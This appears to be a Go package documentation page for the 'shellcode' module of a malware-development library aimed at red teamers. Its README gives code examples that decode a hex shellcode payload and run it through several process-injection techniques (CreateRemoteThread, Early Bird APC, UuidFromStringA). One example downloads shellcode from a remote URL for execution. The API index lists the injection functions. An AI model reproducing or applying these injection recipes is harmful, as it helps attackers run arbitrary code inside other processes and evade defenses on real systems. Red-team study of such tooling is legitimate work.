shellcode

package

v0.1.1 Latest Latest Go to latest Published: Jan 13, 2023 License: MIT Imports: 14 Imported by: 0

Details

Valid go.mod file
Redistributable license
Tagged version
Stable version
Learn more about best practices

Repository

github.com/D3Ext/maldev

Links

Open Source Insights

README ¶

Shellcode Examples

This package provides useful functions to help red teamers with shellcode injection

* Have in mind that a lot of errors have not been handled in shellcode injection techniques because they usually throws false errors. However it should work as expected

All Shellcode Injection Techniques

package main

import (
  "log"
  "encoding/hex"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  calc_shellcode, _ := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")

  err := shellcode.CreateProcess(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.EarlyBirdApc(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.UuidFromStringA(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.CreateRemoteThread(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }
}

Get shellcode from file

package main

import (
  "log"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  shellcode_to_exec, err := shellcode.GetShellcodeFromFile("./shellcode.bin")
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(shellcode_to_exec)
}

Get shellcode from remote url

package main

import (
  "log"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  shellcode_to_exec, err := shellcode.GetShellcodeFromUrl("http://192.168.1.6/shellcode.bin")
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(shellcode_to_exec)
}

Documentation ¶

Index ¶

func CreateProcess(shellcode []byte) error
func CreateRemoteThread(shellcode []byte) error
func CreateThread(shellcode []byte, handle uintptr, ...)
func EarlyBirdApc(shellcode []byte) error
func GetShellcodeFromFile(file string) ([]byte, error)
func GetShellcodeFromUrl(sc_url string) ([]byte, error)
func UuidFromStringA(shellcode []byte) error

Constants ¶

This section is empty.

Variables ¶

This section is empty.

Functions ¶

func CreateProcess ¶

func CreateProcess(shellcode []byte) error

func CreateRemoteThread ¶

func CreateRemoteThread(shellcode []byte) error

func CreateThread ¶

func CreateThread(shellcode []byte, handle uintptr, NtAllocateVirtualMemorySysid, NtProtectVirtualMemorySysid, NtCreateThreadExSysid uint16)

func EarlyBirdApc ¶

func EarlyBirdApc(shellcode []byte) error

func GetShellcodeFromFile ¶

func GetShellcodeFromFile(file string) ([]byte, error)

func GetShellcodeFromUrl ¶

func GetShellcodeFromUrl(sc_url string) ([]byte, error)

func UuidFromStringA ¶

func UuidFromStringA(shellcode []byte) error

Types ¶

This section is empty.

Source Files ¶

View all Source files

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL